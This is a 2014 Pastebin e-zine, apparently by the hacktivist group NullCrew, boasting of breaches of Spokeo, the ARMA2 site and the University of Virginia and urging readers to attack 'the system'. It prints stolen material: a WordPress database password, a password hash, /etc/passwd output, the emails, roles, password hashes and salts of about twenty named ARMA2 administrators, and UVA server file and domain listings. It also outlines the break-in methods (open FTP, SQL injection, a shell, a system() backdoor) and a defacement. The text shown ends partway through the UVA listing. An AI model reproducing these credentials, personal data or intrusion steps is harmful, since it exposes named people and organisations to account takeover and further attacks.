daily pastebin goal
42%
SHARE
TWEET

NullCrew #FuckTheSystem issue #5!

a guest Apr 20th, 2014 6,231 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ███████████████████████████████████████████████████████████████████████████████████████████████████████
  2. █                 Fuck feds, fuck police, fuck the government and most of all...                      █
  3. █                                                                                                     █
  4. █                `                ``````.` .`..``` ``                                                 █
  5. █ ███                        ```.`.`...-``.--.--:-/:/--:--:`                           ██  █  2012 (X)█
  6. █ █                       `.---:----.`.``.`.``...`---::-----/+::`                      █ █ █  2013 (X)█
  7. █ ███                   `:...---/---.``````` ` `` ` `....-.-..-..---:.                 █  ██  2014 (X)█
  8. █ █                 .-//--...`.-.`.``` ```        ````````  ``..`--.--`                               █
  9. █              .-`.----..`.`.``  ` `                ` ``    ```-:--....                █   █ Issue #5 █
  10. █ █ █           `//::-`..:-..`  `     ``                   ``     `.`..-.`:`           █   █          █
  11. █ █ █          /o///:...:-.``      ` `                      ```     ``..```--          █████       4  █
  12. █ ███         ds+/--:--.... `     ``             `           ```     `...-`.-                      2  █
  13. █            omy+:--::/:``````                        `               ``.-:-..:        █           0  █
  14. █ ███       Ndy+:--`.-..``                                              .---`-.        █              █
  15. █ █         .dsh+-::--/--.`                                                ....`.`     █           e  █
  16. █ ███       omhs-:-:-:-..`                                   `             ``.`-``     █████       d  █
  17. █        `mdmo/s+-/:::.                                                  `.-`.:``                  i  █
  18. █ █ █    .MNN+oho+o/++.``                                                 `...:::       █          t  █
  19. █ ██     -Ndmssyo://+/...            `   `                                ```.--o       █          o  █
  20. █ █ █    -MMhy:/:--+://-.`          `  `  `````                           `.`.-/d`      █          n  █
  21. █ █  █  MNNmys:-:/:++--` `             ``````                      ` `````..-/d`        █████         █
  22. █       .NMMNsy:-.///s:/-.```            `  ``                       ``.- .-:-+h`                     █
  23. █       `NMMMds+-/.--:---.``  `          ` `..                    `  `````::-:+h`      █████          █
  24. █ █████   oMMMMMms+//+oo-::.``...```` `````..--.`             ` ```.````..:o/+sos      █              █
  25. █   █    `dMMMMMdyo:-/+::---..-`-.``...``..::...``````     ```` ..-```..:/hyssy/       █              █
  26. █   █     -NMMMMMMmddso+//o+-:--.-...`.:-.-:---..-`.``  ` .````  ...`--+shmNmdd        █              █
  27. █   █      -NMMMMMMNNMNddhhmdyo+:/::-..-.-----:-:-..---........`.-..:++ymMNNmM:        █████          █  
  28. █ █   █    mmNmddhhhdhyhmdNNNmdyhy:..--/:-.-:s+-::--/::++yso+/ooshhmNNMNmNMs                          █
  29. █ █████      +hNMMMMMMMMNNmmdmdhhdNmdso//:o:::+oyyyosdmddddddhhdmNmmNMNNNdmm+           ████          █
  30. █ █   █       ooNMMMMMMMMMMMNMMMMNhsNmhy+/+++ohshNNNdyhyydNMMMMMMMMMMMMMMMm:            █  █          █
  31. █            +yNMMMMMMMMMNo/yMMMMMdhhso+o/+++ydMhydMMMMMNhhMMMMMMMMMMMNm.               ███           █
  32. █ █████        /shoMMMMMMMMNMN+mMMMMMNy/://:-:-/dodMNMMMd:+yNMMMMMMMMMN+s`              █  █          █
  33. █ █            -yhdshMMMMMMMMMMMmMMMMNs/--.:.`-.+hNMMMNNhdMMMMMMMMMMNs/s`               █   █         █          
  34. █ █████         os/hhoymMMMMMMMMNNMMMN:..--.-.``-mMMMMMMMMMMMMMMMMhoos/+                              █
  35. █ █             `h+-:+sosshdNMMMNMMMd/..---..-.` /dMMMMMMMMMMMNhoosy:-+.                 █████        █
  36. █ █████          .do-.``+++//:////:.``-.--.``..-..`/shddmdhyyoosso```+-                  █            █
  37. █                .sh/.`     ``..``...----...--:.---..::+/+//--````-+-                    █            █
  38. █                   +ms/-``   ``.---.-...---`.-::.-.-.`````  ` .-+s/`                    █████        █
  39. █  ████               oyh+:.` ` `......-:-:...-:o/.`.`````.`-:osdy.                      █            █
  40. █ █    █               /ys/:.` `````.`--os-`:o+.-. ` `..-/+sddh:`                        █            █
  41. █ █                       `os+..```` `..`-...`````````.--/oyhdo-`                        █████        █
  42. █  ████                     -yo:-..```..```.``   ....-:+oddmy-                                        █
  43. █      █                    y/.-.```.-::-:-:.-/+::/shydy/     `   `                      █     █      █
  44. █ █    █                     `/o:..```..`` .`.`.::-+hdh-    `..`.`.                      █     █      █
  45. █  ████      `                 y/.` ```` ` ```.-/dNy          ...                        █     █      █
  46. █                               oMMNh+:.` `` `.:ohmmmd`                                  █  █  █      █
  47. █ █  █                       .  ymNNMNmmdhhdhmNNmmmmyo-                                  █ █ █ █      █
  48. █  █ █                        `    ..:::::/:/+:/:-``.`                                    █   █       █
  49. █   ██                                   ``                                                           █
  50. █    █                                                                                                █
  51. █    █                                                                                                █
  52. █                                                                                                     █
  53. █  ████                                                                                               █
  54. █ █    █                                                                                              █
  55. █ █                                                                                                   █
  56. █  ████                                                                                                     █
  57. █      █                                                                                              █
  58. █ █    █                                                                                              █
  59. █  ████                                                                                               █
  60. █                                                                                                     █
  61. █  █████                                                                                              █
  62. █    █                     NullCrew. (Zer0Pwn, rootcrysis, Siph0n.):                                  █
  63. █    █                 This is a 4/20 zine, how ya gonna read it with no weed?                        █
  64. █    █                 FIRE UP!!                                                                      █
  65. █                                                                                                     █
  66. █  █████              Music for this zine!                                                            █
  67. █  █                                                                                                  █
  68. █  █████   Just tell them now they better hit the ground, all you hear is hostage down!               █
  69. █  █       Whether Office, Dust, Aztec, or Lounge? All I hear is hostage down!                        █
  70. █  █       So the terrorists getting the message now? All I hear is, hostage down!                    █
  71. █  █████                                                                                              █
  72. █                                                                                                     █
  73. █  █   █                                                                                              █
  74. █ █ █ █ █                                                                                             █
  75. █ █  █  █                                                                                             █
  76. █ █     █                                                                                             █
  77. █                                                                                                     █
  78. ███████████████████████████████████████████████████████████████████████████████████████████████████████
  79.         █                                                                           █
  80.         █                       TABLE OF CONTENT                                    █
  81.         █                                                                           █
  82.         █████████████████████████████████████████████████████████████████████████████
  83.                   █                                                       █
  84.                   █   sPOKEO:                                             █
  85.                   █   ARMA2:                                              █
  86.                   █   VIRGINIA.EDU:                                       █                                                                    
  87.                   █   Klas Telecom:                                       █
  88.                   █   in.gov (Zimbra.):                                   █
  89.                   █   Telco Systems:                                      █
  90.                   █   National Credit union:                              █
  91.                   █   Science and Technology center (stcu.int)            █
  92.                   █   International Civil Aviation Organization(icao.int) █
  93.                   █████████████████████████████████████████████████████████
  94.  
  95.  
  96.  
  97.  
  98. █████   █████  █████  ███   ████   ███████     █    █   ██████ ███████  ███████   ████   █████  █
  99.   █     █   █    █    █  █ █    █  █    ███    █    █  █          █        █     █    █  █   █
  100.   █     █   █    █    █    █    █  █      ██   █    █  █          █        █     █    █  █   █
  101.   █     █   █    █    █    █    █  █        █  █    █  █          █        █     █    █  █   █
  102.   █     █   █    █    █    █    █  █       █   █    █  █          █        █     █    █  █   █
  103. █████   █   █    █    █     ████   ████████     ████    ██████    █     ███████   ████   █   █  █
  104.  
  105.  
  106.  
  107.   Once upon a time, in 2012; A group of electronic brotherhood was born within the shadows of the legendery deep-web.
  108.  This group excelled throughout time gaining noterity, eventually gaining a strong stature in the hacker-community.. Well.
  109.  Imagine this, a year in and this group goes silent.. they lurk in the shadows.
  110.  
  111.  
  112.   Oh no! The group, they must have gotten v&! What-ever shall we do!? The many people wonder.
  113.  Whelp, folks, we're here with some good information for you! #FuckTheSystem continues on!
  114.  We would like to point out a few things about this e-zine ahead of time, before you go on the view the contents.
  115.  
  116.   This zine is titled #FuckTheSystem for a reason, and that reason is because the system is corrupt.
  117.  So, for #FuckTheSystem we've decided to own and destroy several things belonging to something in the system.
  118.  We're not your average super-heros of the internet; but we do dispense lulz at a heavy ammount when needed.
  119.  
  120.   #FuckTheSystem is generally aimed at the government, or anything that is corrupt; and that is the reason for these attacks.
  121.  Ranging from government contractors, to universities, to telecommunications compaines, to information databases, and other things.
  122.  They are all part of the system; and have failed examinations the first time arround; some of the attack methods may have been simple.. or the data not to complex.
  123.  But, it can still lead to things that they do not want; and it also costs them, therefore we have commited actual damage to this certain aspect of the system. In a way, we achieve our goal.
  124.  
  125.  
  126.   Anyone can #FuckTheSystem, not just us; You don't have to be an hacktivist, you just need to be an activist.
  127.  You must have a voice that you want to be heard, and you can make that voice heard; We do it in this way, and it is effective.
  128.  Anything works: Pictures, videos, graffiti, removal of survices, and of course.. hacking. There are many other things, you can figure it out.
  129.  
  130.   Ah, bahumbug, I think we've went on a bit to long about this; let's get on to the zine! - NullCrew
  131.  P.S: There will be a download link at the end of the e-zine, just so you can download all of the data we took and mentioned, have fun.
  132.  
  133.                       rootcrysis  Zer0Pwn    Siph0n
  134.                           ^          ^         ^
  135.            .-"""-.       \_/        \_/       \_/  
  136.           /       \      / \        / \       ) (   WE'VE LANDED MOTHERFUCKERS!
  137.        .--'._____.'--.   \"/        \"/       \"/
  138.       ( o     _     o )  /|\__,   __/|\       /|\
  139.        '-..o_|_|_o..-'   \|      `   | \     / | \
  140.         /        \      ` |\         |\ `   ` /|  `
  141.        ()          ()     | \        / |   __/ |
  142.                           | /       /  |  `    |
  143.                           ` `      `   `       `
  144.  
  145.  
  146.  ██   █                          █████
  147. █ █      ███  █████  ████  █  █  █      █████
  148.   █     █   █ █   █ █    █ █ █   █     █     █
  149.   █     █     █   █ █    █ ██    █████ █     █
  150. █████ █  ███  █████ █    █ █ █   █     █     █
  151.             █ █     █    █ █  █  █     █     █
  152.         ████  █      ████  █   █ █████  █████
  153.  
  154.      Alright, let's begin this story of rampage against Spokeo's administrators and web-developers.
  155.    Now, I know you all are going to find this method laughable; However.. Spokeo had:
  156.                                    
  157.    1) A web-developer with FTP open on their private server.
  158.    2) The web-developers server maintained a constantly updated copy of spokeo.com/blog's wp-config.php file
  159.                      
  160.     So, this was literally pretty fucking easy for us; Spokeo's web-developers private server maintained that, with FTP open..
  161.    Whelp, knowing this? We decided to plug ourselves into that FTP, grab a copy of wp-config.php (For the private server.)
  162.    And then practically just log into wordpress as administrator, shell; and had some fun collecting what we could before spokeo caught on.
  163.  
  164.    So, spokeo, what is it that we have learned today? Your administrators are more unsecure then your wifes vag to us..
  165.  
  166.  
  167.         *Spokeo.com
  168.  
  169.             Uname:
  170.             User:
  171.             Php:
  172.             Hdd:
  173.             Cwd:        Linux ip-10-249-65-47 3.4.73-64.112.amzn1.x86_64 #1 SMP Tue Dec 10 01:50:05 UTC 2013 x86_64 [exploit-db.com]
  174.                         48 ( apache ) Group: 48 ( ? )
  175.                         5.3.28 Safe mode: OFF [ phpinfo ] Datetime: 2014-01-21 09:22:18
  176.                         7.87 GB Free: 1.46 GB (18%)
  177.                         /var/www/ drwxr-xr-x [ home ]
  178.  
  179.                         Name    Size    Modify  Owner/Group     Permissions     Actions
  180.                         [ . ]   dir     2014-01-16 23:56:56     0/0     drwxr-xr-x      R T
  181.                         [ .. ]  dir     2014-01-17 22:20:04     0/0     drwxr-xr-x      R T
  182.                         [ blog-old ]    dir     2014-01-16 03:07:42     48/48   drwxr-xr-x      R T
  183.                         [ cgi-bin ]     dir     2013-12-10 00:29:49     0/0     drwxr-xr-x      R T
  184.                         [ error ]       dir     2014-01-07 17:43:04     0/0     drwxr-xr-x      R T
  185.                         [ fixed ]       dir     2014-01-16 23:43:54     0/0     drwxr-xr-x      R T
  186.                         [ html ]        dir     2014-01-16 03:21:31     0/0     drwxr-xr-x      R T
  187.                         [ icons ]       dir     2014-01-07 17:43:10     0/0     drwxr-xr-x      R T
  188.                         [ src ] dir     2013-12-06 00:59:16     48/48   drwxr-xr-x      R T
  189.                         .htaccess       141 B   2014-01-08 19:17:23     0/0     -rw-r--r--      R T E D
  190.                             blog        45 B    2014-01-16 23:57:47     0/0     -rw-r--r--      R T E D
  191.  
  192.  
  193.     Okay, so, we checked the blog out; right? Like we said above. The administrator in this server kept a constantly updated version of wp-config.
  194.    So, let's get to that:
  195.  
  196.                       (Blog)   
  197.                       spokeo:$apr1$8HLyBy87$tDdtmCWPxlWbS0fugaiEQ1
  198.  
  199.                       WP-Config:
  200.                       /** MySQL database username */
  201.                       define('DB_USER', 'wordpress');
  202.  
  203.                      /** MySQL database password */
  204.                      define('DB_PASSWORD', 'abra30hp');
  205.  
  206.                     /** MySQL hostname */
  207.                     define('DB_HOST', 'localhost');
  208.  
  209.  
  210.    Okay, so, no; we didn't get root; but, here you go:
  211.  
  212.                   : cat /etc/passwd
  213.                  
  214.                     root:x:0:0:root:/root:/bin/bash
  215.                     bin:x:1:1:bin:/bin:/sbin/nologin
  216.                     daemon:x:2:2:daemon:/sbin:/sbin/nologin
  217.                     adm:x:3:4:adm:/var/adm:/sbin/nologin
  218.                     lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
  219.                     sync:x:5:0:sync:/sbin:/bin/sync
  220.                     shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
  221.                     halt:x:7:0:halt:/sbin:/sbin/halt
  222.                     mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
  223.                     uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
  224.                     operator:x:11:0:operator:/root:/sbin/nologin
  225.                     games:x:12:100:games:/usr/games:/sbin/nologin
  226.                     gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
  227.                     ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
  228.                     nobody:x:99:99:Nobody:/:/sbin/nologin
  229.                     ec2-user:x:222:500:EC2 Default User:/home/ec2-user:/bin/bash
  230.                     saslauth:x:221:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
  231.                     mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
  232.                     smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
  233.                     ntp:x:38:38::/etc/ntp:/sbin/nologin
  234.                     sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
  235.                     tcpdump:x:72:72::/:/sbin/nologin
  236.                     dbus:x:81:81:System message bus:/:/sbin/nologin
  237.                     mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
  238.                     apache:x:48:48:Apache:/var/www:/sbin/nologin                            
  239.  
  240.  
  241.       Don't think that's all, because it's not; In the download at the end of the zine is one of spokeos sql dbs, have fun!  .
  242.          And also, as proof that we did indeed achieve this; at the time of the exploit, we defaced their blog's index.
  243.                      
  244.                         Mirror: http://zone-h.com/mirror/id/21609991
  245.  
  246.                                     ███
  247.  ███  █  ███  █████  █   █   ███   █   █
  248. █   █   █   █ █   █ █ █ █ █ █   █     █
  249.    █    █████ ████  █  █  █ █████   ██
  250.  ██     █   █ █   █ █     █ █   █  █        
  251. █                                  ████
  252. ████  █    
  253.  
  254.    On to the next one, which is ARMA2; Now, what is ARMA?
  255.   Arma is a video-game that military occupants use to gain knowledge.
  256.  
  257.    Arma sadly didn't have much interesting in it; Aside from a SQL Injection vulnerability that we exploited.
  258.   What we were able to grab, instead; were administrator passwords belonging to ARMA2's website.
  259.   Amongst a few other things, of course.
  260.  
  261.         ██████████████████████████████████████████████
  262.         █S3RV3R INF0RMATI0N:                       █
  263.         █web application technology:PHP 5.4.12, Nginx█
  264.         █3XPL0IT ALLOWED BY: JOOMLA                  █     
  265.         █DBMS:MySQL 5.0                                    █
  266.         ██████████████████████████████████████████████
  267.  
  268.            email, username, usertype, password
  269.  
  270.            alexander.harlander@petergames.de:Morphicon:Editor:8882efcade928d9ee7c9a5663d102c4b:pMsFohI8s2Ybcf9ELDAQNX617oH1sgbE
  271.            carey.james@gmail.com:JCarey:Editor:d98af715e64f5ad934885d0f3c7670d8:wReCiDAkQrGlVpymplRYGLAQU573Neme
  272.            dan@altargames.com:dmusil:Manager:32c3dacb5ccb11d17e78b0213f3bc9ec:eKzhfALEnYbYilxh1ooHeZeZ550is45R
  273.            dave@altargames.com dave:Author:f89764e4af4f12da89f22249b75a4c46:gAFUDZoAt33SjXQ9opHK8EzLywnwrY2g
  274.            dwarden@bistudio.com:Dwarden:Manager:e81d60b356e51801f4953becce7ff38f:bMsIEoaKrDARcN9GCtvS8sqvejg9FMY2
  275.            hlavac@bistudio.com:hlavac:Super Administrator:9492ac0bfdb364155b011bdd131e2803:dUyNEubxcDLMh30ol8tsadMaOLdQjQLm
  276.            ivan@bistudio.com:Ivan:Manager:1e45d443266ce93f9dea0cf55e891e2d:iT9ow9gjPCnenYPRrdGkcPRuyNwRK8v4
  277.            jan.prazak@bistudio.com:admin:Super Administrator:9fa68fda92746ea27e972e43e02436af:ChQ20HRqOmhKemU5aVnAUvuLY5i4vl2C
  278.            jay.crowe@gmail.com:jay:Administrator:b01de7f6edb9a46d9e15b2dbc0bb156b:TM5NyeccedXVrUJwQcDtnQXmugkZfVCk
  279.            jennik@vrtule.info:jennik:Manager:4c2d0769198ea6a133100021a0558c11:i2xTbLPXc0qedLJ5htl33jdqRsPhuUCT
  280.            jervant.malakjan@bistudio.com:Jervant:Super Administrator:036252be62b5fae2c244e989ed32f485:vC8RkTdOMA4U9YMKmbqJ5XpjDGR1qmrJ
  281.            kunt@idea-games.com:kunt:Super Administrator:4020b9d55d6066fee53daf2f567e3cef:wWmNJsCNz8zbGw6pwQEiQw67ZZuyHXA3
  282.            lukas@bistudio.com:lukas:Manager:f773700d68e492721659877a0f3939a0:isVwTHFMRumLP7p2y1SBeYwTnXnvpNDQ
  283.            michal@idea-games.com:Harangozo:Manager:e5caaeaea2353d2c3995e069ad53a7b6:uSTumeJlyOE8gmwUdoQPN1S8cYN6Z6GB
  284.            pavel.medek@bistudio.com:meddy:Editor:db607e2a877084c764c790d764bdf3dd:HHd3GUnE93KQAs0uQ1LDePU6QkXKLsPW
  285.            pettka@altargames.com:Pettka:Administrator:df3aef513b8c1294e28cc39d8404a621:dqILH3a1pdI509xCrz6W9mI64FdgjY83
  286.            placebo@bistudio.com:placebo:Author:9f7062ccd0e20bd725e5e09d90f01c39:OQpUsc5G0XzcavaaMPNcRkk7RzM1iigN
  287.            spanel@bistudio.com:Maruk:Administrator:e722beab3a581d403138c5aa40094201:oLtJHdBw7xnSMo7Ab8cq8Nwkv9Mv0b9K
  288.            unicorn@altargames.com:ikkaku:Administrator:9b3c5af7720da3a7bf4880655e6a93cd:YDmqdNSR2eNKjQaoU78JL1bdM1mjMp9L
  289.            vasa@bistudio.com:vasa:Super Administrator:c301ce7a3d2fbf58acba2ebd69abf13b:baokGrB1Q1GdyQMRbL7JOMFpfVb84gol
  290.            wocko@email.com:wocko:Manager:c2c72869c0974cd86aea9b5b60280ab3:OwOzsiNR0vMRVeO1Ome8mj4XLsTyepV4
  291.  
  292.  
  293.                                          
  294.          █  █ █     █  ███
  295.  ███  █  █  █  █   █  █   █
  296. █   █    █  █   █ █   █████
  297.    █     ████    █    █   █
  298. █   █
  299.  ███  █
  300.  
  301.     UVA, Also known as the University Of Virginia; Or virginia.edu..
  302.    Let's start with security standards taken since the last break-in:
  303.  
  304.           1) Disable word-press logins assuming that hackers have ONLY taken advantage of your out of date WP versions.
  305.           2) What, no number two? Why is that, NullCrew?
  306.  
  307.     Funny that you ask, the University Of Virginia, we were able to spawn a system() backdoor and skim through your files.
  308.    It's also noticably laughable that the UVA IT Crew decides that everything is secure enough to host a good few other sites, with shared hosting.
  309.    Now, you can't have all the goodies.. BUT: We will give you enough to tide you over.
  310.  
  311.     Oh, and UVA? Secure your shit, or get owned over and over and over again; several of your subdomains are exploitable.
  312.    Not to mention that where it's all shared, every website hosted by UVA?.. Whelp, root one, get them all.
  313.  
  314.  
  315.           uname -a AIX ws9-1 3 5 000458FAD300
  316.          
  317.           ls /:
  318.              X11.5
  319.              audit
  320.              bin
  321.              bosinst.data
  322.              common
  323.              contrib
  324.              core
  325.              dev
  326.              etc
  327.              frame
  328.              gnu
  329.              h1
  330.              h2
  331.              home
  332.              image.data
  333.              itc
  334.              lib
  335.              lost+found
  336.              lpp
  337.              lv1
  338.              lv1new
  339.              lv2
  340.              man
  341.              mnt
  342.              mount.a237722
  343.              mount.t237722
  344.              na
  345.              net
  346.              opt
  347.              proc
  348.              rs6000
  349.              sbin
  350.              smit.log
  351.              smit.script
  352.              smit.transaction
  353.              tftpboot
  354.              tmp
  355.              u
  356.              unix
  357.              usr
  358.              uva
  359.              var
  360.              vfs.t237722
  361.              web
  362.              web.pri
  363.              web.sec
  364.              www
  365.            
  366.           ls /web:
  367. 2012-13yir.artsandsciences.virginia.edu aaheritageva.org aahv.virginiafoundation.org accdb.bme.virginia.edu accs.virginia.edu acrossthefootbridge.com acrossthefootbridge.org adh.art.virginia.edu advance.virginia.edu aix-web-cluster-1.itc.virginia.edu albemarleemergency.com albemarleemergency.org alumnitravel.virginia.edu amalgam.virginia.edu americanpoliticaldevelopment.org americanpresident.org amp.sys.virginia.edu appreciativeinquiry.virginia.edu approject.org artsandsciences.virginia.edu artsboxoffice.virginia.edu ashaforeducation.orgs.virginia.edu backstory.vfhblogs.org backstory2013.vfhblogs.org backstoryradio.net backstoryradio.org behaviorprogress.org behaviorprogress.virginia.edu bioethics.virginia.edu biomath.virginia.edu blackunionsoldiers.org blog.bioinformatics.virginia.edu blog.cvrc.virginia.edu blog.encyclopediavirginia.org blog.innovation.virginia.edu bme.virginia.edu board.vfhblogs.org board.virginiafoundation.org bohr.ms.virginia.edu bookartspress.com bookartspress.net bookartspress.org bsuva-epubs.org bsuva.org buildingbetterteachers.org campaign.artsandsciences.virginia.edu campaign.virginia.edu ce.virginia.edu cee.virginia.edu centerforpolitics.org central.itc.virginia.edu cgep.virginia.edu charlottesvilleemergency.com charlottesvilleemergency.org climate.virginia.edu collegehealthsurveillancenetwork.org communityemergency.com communityemergency.org coopercenter.org cpe.virginia.edu creativewriting.virginia.edu cts.virginia.edu curry.edschool.virginia.edu curry.virginia.edu curryschool.net curryschool.org cvrc.virginia.edu cvwp.net cvwp.org darden.virginia.edu data.bioinformatics.virginia.edu dc.vfhblogs.org demographics.coopercenter.org dept.biology.virginia.edu dev.artsandsciences.virginia.edu dev.ce.virginia.edu dev.centerforpolitics.org dev.coopercenter.org dev.curry.virginia.edu dev.cvrc.virginia.edu dev.hereford.virginia.edu dev.mae.virginia.edu dev.math.virginia.edu dev.mlbs.virginia.edu dev.mobile.virginia.edu dev.rarebookschool.org digitalstoryteller.org discoveringcurry.com dnaseq.med.virginia.edu docscompass.virginiafoundation.org documentscompass.org dscourse.org ecomod.virginia.edu edui.vfhblogs.org edui2009.vfhblogs.org edui2011.vfhblogs.org edui2012.vfhblogs.org eduiconf.org ee2.hr.virginia.edu engl.virginia.edu essaysinhistory.com essaysinhistory.net essaysinhistory.org etc ev.vfhblogs.org expandingcollegeopps.org faculty.virginia.edu files-with-low-gid folklife.vfhblogs.org folklifefieldnotes.org folklifefieldnotes.vfhblogs.org frog.edschool.virginia.edu genesis2.virginia.edu genesisII.virginia.edu genesisii.virginia.edu globalhealth.cgh.virginia.edu goodpolitics.net goodpolitics.org graduate.engl.virginia.edu gwpapers.virginia.edu harvardprincetonuva.com hereford.virginia.edu hfb.vfhblogs.org history.virginia.edu homedir.virginia.edu hoosonline.virginia.edu hoovision.athletic.virginia.edu hr.virginia.edu iasc-culture.org iath.virginia.edu ien.arch.virginia.edu im.dev.virginia.edu indorgs.virginia.edu infotech.seas.virginia.edu iris.virginia.edu isweb jefferson.village.virginia.edu kcci.virginia.edu kinzie.edschool.virginia.edu kluge-ruhe.org krs.clas.virginia.edu lib.law.virginia.edu linux-web-cluster-2.itc.virginia.edu linux-web-cluster-3.itc.virginia.edu livedtheology.org louisiananativeguard.org ltap.cts.virginia.edu m.vabook.org macarthur.virginia.edu marriagematters.virginia.edu math.virginia.edu medicine.virginia.edu midatlantic-terascale.org millercenter.virginia.edu mlbs.org mlbs.virginia.edu mlp.virginia.edu mobile.virginia.edu modernpoetry.engl.virginia.edu morphogenesis.virginia.edu mrsec.virginia.edu msdnaa.virginia.edu mydcav.org mylabpartner.org myuva.virginia.edu nationalsocialnorm.com nationalsocialnorm.org nationalsocialnorminstitute.com nationalsocialnorminstitute.org nationalsocialnorms.com nationalsocialnorms.org nationalsocialnormsinstitute.com nationalsocialnormsinstitute.org new.artsandsciences.virginia.edu new.hereford.virginia.edu new.trc.virginia.edu news.virginia.edu nrcgtuva.org ntlcoalition.org ntls.info officearchitect.virginia.edu old.backstoryradio.org old.engl.virginia.edu old.readmeridian.org old.uvacse.virginia.edu oldbooks.virginia.edu online.seas.virginia.edu onlinelearn.edschool.virginia.edu opengrounds.virginia.edu openportfolio.org organizationalexcellence.virginia.edu outs parallaxproject.org pdk.edschool.virginia.edu pharm.virginia.edu pi.math.virginia.edu pibeta.phys.virginia.edu podcast.virginia.edu poetryforge.org policog.politics.virginia.edu primaryaccess.org proxy.virginia.edu pva.med.virginia.edu raisetherank.com rarebookschool.com rarebookschool.net rarebookschool.org rbsconnect.org readingfirst.virginia.edu readingquest.org readmeridian.org recsports.virginia.edu redirect-test.vfhblogs.org rff.vfhblogs.org rff.virginiafolklife.org riggoryridge.org rodmanscholars.org romereborn.virginia.edu rotunda.virginia.edu rotunda_cam salsaclub.orgs.virginia.edu sciencescholars.clas.virginia.edu seas.virginia.edu sexualassault.virginia.edu share silenegenomics.biology.virginia.edu sis.virginia.edu site.virginia.edu smarttravellab.virginia.edu social.virginia.edu socialnorm.org socialnorminstitute.com socialnorminstitute.org socialnorms.org socialnormsinstitute.com socialnormsinstitute.org sophiarosenfeld.com southernmediafund.org special.edschool.virginia.edu staging.aaheritageva.org staging.hr.virginia.edu staging.rotunda.virginia.edu staging.virginia.edu state.virginia.edu storyweb.org studiorecover.virginia.edu studyabroad.virginia.edu sysbio.virginia.edu teach.virginia.edu teacherlink.org teis.virginia.edu tempo.virginia.edu test test.artsandsciences.virginia.edu test.che.virginia.edu test.iath.virginia.edu test.millercenter.virginia.edu test.rarebookschool.org test.romereborn.virginia.edu test.vfhblogs.org testhost.virginia.edu titus-group.med.virginia.edu tlp.seas.virginia.edu today.news.virginia.edu trc.virginia.edu tti.virginia.edu uva.healthfoundation.virginia.edu uva2go.net uva2go.org uvacatering.com uvacse.virginia.edu uvaemergency.com uvaemergency.org uvafallschurch.com uvafamilies.virginia.edu uvarichmond.com uvaspeechandhearing.org uvatibetcenter.org uvatogo.net uvatogo.org vabc.vfhblogs.org vabook.org vaindianprogram.com vaindianprogram.net vaindianprogram.org vfh.vfhblogs.org vfhblogs.org vfhevents.vfhblogs.org vfhevents.virginia.edu vfhradio.org vfhumanities.org vhosts.itc.virginia.edu vignettes.vfhblogs.org virginiabookarts.org virginiabookarts.vfhblogs.org virginiafolklife.org virginiafoundation.org virginiahumanities.org virginiaindianprogram.com virginiaindianprogram.net virginiaindianprogram.org virginiavignettes.org viseyes.org viva.ee.virginia.edu w wais wc.engl.virginia.edu web-clusters-monitor webtest.itc.virginia.edu wgr.vfhblogs.org whitehousetapes.org withgoodreasonradio.org womenscenter.virginia.edu ws0-2.itc.virginia.edu ws1-2.itc.virginia.edu ws10.itc.virginia.edu ws11.itc.virginia.edu ws12.itc.virginia.edu ws13.itc.virginia.edu ws16.itc.virginia.edu ws17.itc.virginia.edu ws2-2.itc.virginia.edu ws3-2.itc.virginia.edu ws4-2.itc.virginia.edu ws5-2.itc.virginia.edu ws6-2.itc.virginia.edu ws7-2.itc.virginia.edu ws8-2.itc.virginia.edu ws9-2.itc.virginia.edu www.aaheritageva.org www.aahv.virginiafoundation.org www.advance.virginia.edu www.albemarleemergency.com www.albemarleemergency.org www.alumnitravel.virginia.edu www.amalgam.virginia.edu www.americanpoliticaldevelopment.org www.americanpresident.org www.appreciativeinquiry.virginia.edu www.approject.org www.artsandsciences.virginia.edu www.artsboxoffice.virginia.edu www.backstory.vfhblogs.org www.backstory2013.vfhblogs.org www.backstoryradio.net www.backstoryradio.org www.behaviorprogress.org www.bioethics.virginia.edu www.biomath.virginia.edu www.blackunionsoldiers.org www.bme.virginia.edu www.board.vfhblogs.org www.board.virginiafoundation.org www.bookartspress.com www.bookartspress.net www.bookartspress.org www.bsuva-epubs.org www.bsuva.org www.buildingbetterteachers.org www.campaign.artsandsciences.virginia.edu www.campaign.virginia.edu www.cci.virginia.edu www.ce.virginia.edu www.cee.virginia.edu www.centerforpolitics.org www.cgep.virginia.edu www.charlottesvilleemergency.com www.charlottesvilleemergency.org www.che.virginia.edu www.climate.virginia.edu www.collegehealthsurveillancenetwork.org www.communityemergency.com www.communityemergency.org www.coopercenter.org www.cpe.virginia.edu www.creativewriting.virginia.edu www.cts.virginia.edu www.curry.virginia.edu www.cvwp.net www.cvwp.org www.darden.virginia.edu www.dc.vfhblogs.org www.digitalstoryteller.org www.discoveringcurry.com www.documentscompass.org www.dscourse.org www.ecomod.virginia.edu www.edui.vfhblogs.org www.edui2009.vfhblogs.org www.edui2011.vfhblogs.org www.edui2012.vfhblogs.org www.eduiconf.org www.essaysinhistory.com www.essaysinhistory.net www.essaysinhistory.org www.ev.vfhblogs.org www.expandingcollegeopps.org www.faculty.virginia.edu www.folklife.vfhblogs.org www.folklifefieldnotes.org www.folklifefieldnotes.vfhblogs.org www.genesis2.virginia.edu www.genesisII.virginia.edu www.genesisii.virginia.edu www.goodpolitics.net www.goodpolitics.org www.gwpapers.virginia.edu www.harvardprincetonuva.com www.hereford.virginia.edu www.hfb.vfhblogs.org www.homedir.virginia.edu www.hoosonline.virginia.edu www.hr.virginia.edu www.iasc-culture.org www.iath.virginia.edu www.indorgs.virginia.edu www.jilluva.org www.kcci.virginia.edu www.kluge-ruhe.org www.livedtheology.org www.louisiananativeguard.org www.m.vabook.org www.macarthur.virginia.edu www.mae.virginia.edu www.marriagematters.virginia.edu www.math.virginia.edu www.medicine.virginia.edu www.midatlantic-terascale.org www.millercenter.virginia.edu www.mlbs.org www.mlbs.virginia.edu www.mlp.virginia.edu 